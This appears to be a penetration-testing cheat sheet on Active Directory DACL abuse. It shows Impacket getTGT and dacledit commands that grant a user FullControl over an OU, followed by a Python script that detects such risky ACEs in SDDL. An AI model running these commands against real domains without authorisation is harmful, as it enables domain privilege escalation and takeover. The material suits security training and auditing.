DACL (Discretionary Access Control List) Attack
Last modified: 2023-10-22
A DACL is the list of trustees that are allowed or denied access to an object in Active Directory.
Add Rights
We may be able to take full control of securable objects by obtaining the GenericAll permission on an OU (Organizational Unit).
1. Ask TGT for Kerberos Authentication
If we want to use Kerberos authentication for attacking the DACL, we need to retrieve a TGT for a specific user first. In addition, to avoid authentication errors, we need to synchronize the system time with the domain controller using ntpdate or rdate.
sudo ntpdate example.local
# or
sudo rdate -n example.local
impacket-getTGT -dc-ip dc.example.local example.local/username:password
The getTGT command above dumps a .ccache file which stores the TGT.
After dumping the .ccache file, set it in an environment variable so that the later steps can use it.
export KRB5CCNAME=username.ccache
2. Read DACL
We can use Impacket's dacledit, which had not yet been merged as of 2023/10/21. The repository is here: https://github.com/ShutdownRepo/impacket/tree/dacledit
dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password -use-ldaps -k
3. Write DACL
dacledit.py -action write -rights 'FullControl' -principal username -target-dn 'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
dacledit.py -action write -rights 'FullControl' -principal username -target-dn 'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k
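As an added audit check, not part of the original page and not dacledit's own code, the Python below parses the DACL portion of an SDDL string (such as an OU's nTSecurityDescriptor exported in SDDL form) and flags allow-ACEs that hand GenericAll, WriteDacl or WriteOwner to principals outside an expected-admin allowlist; the CI flag it reports is what the -inheritance option above sets. The SDDL sample, the SIDs and the allowlist are constructed.

```python
import re
# SDDL right tokens that let a trustee rewrite an object's ACL or take it over (what
# dacledit -rights 'FullControl' grants), plus the ACCESS_MASK bit for hex-form rights.
CONTROL_RIGHTS = {"GA": 0x10000000, "WD": 0x00040000, "WO": 0x00080000}
# Trustees expected to hold such rights on an OU (constructed allowlist, SDDL aliases).
EXPECTED_TRUSTEES = {"SY", "DA", "EA", "BA"}

def _pairs(field):
    """Split a two-letter-token SDDL field ('CIID' -> {'CI', 'ID'})."""
    return {field[i:i + 2] for i in range(0, len(field), 2)}

def parse_sddl_dacl(sddl):
    """Return the DACL ACEs of an SDDL string as dicts; assumes the usual O:G:D:S: layout."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1) if m else ""):
        parts = body.split(";")
        if len(parts) != 6:
            continue  # malformed ACE: skip rather than guess
        ace_type, flags, rights, _obj_guid, _inherit_guid, trustee = parts
        aces.append({"type": ace_type, "flags": flags, "rights": rights, "trustee": trustee})
    return aces

def control_rights(rights):
    """Control rights present in an ACE rights field, given as tokens or as a hex mask."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {name for name, bit in CONTROL_RIGHTS.items() if mask & bit}
    return _pairs(rights) & set(CONTROL_RIGHTS)

def find_risky_aces(sddl, expected=EXPECTED_TRUSTEES):
    """Allow-ACEs granting GenericAll/WriteDacl/WriteOwner to trustees outside the allowlist."""
    findings = []
    for ace in parse_sddl_dacl(sddl):
        if ace["type"] != "A" or ace["trustee"] in expected:
            continue
        granted = control_rights(ace["rights"])
        if granted:
            flags = _pairs(ace["flags"])
            findings.append({"trustee": ace["trustee"], "rights": sorted(granted),
                             "inherits_to_children": "CI" in flags,  # what -inheritance sets
                             "inherited": "ID" in flags})            # came from a parent
    return findings

# Constructed SDDL for an OU: SYSTEM with full rights, a user SID with inheritable GA,
# Authenticated Users read-only, a second SID with Full Control as a hex mask, one deny ACE.
SAMPLE_SDDL = ("O:DAG:DAD:AI(A;;RPWPCCDCLCSWRCWDWOGA;;;SY)"
               "(A;CI;GA;;;S-1-5-21-1111-2222-3333-1105)(A;CIID;RPLCLORC;;;AU)"
               "(A;;0x000f01ff;;;S-1-5-21-1111-2222-3333-1110)(D;;GA;;;S-1-5-21-1111-2222-3333-1200)")
```

Running find_risky_aces(SAMPLE_SDDL) reports the two non-admin SIDs: the first with an inheritable GA, the second with WD and WO hidden inside the 0x000f01ff Full Control mask.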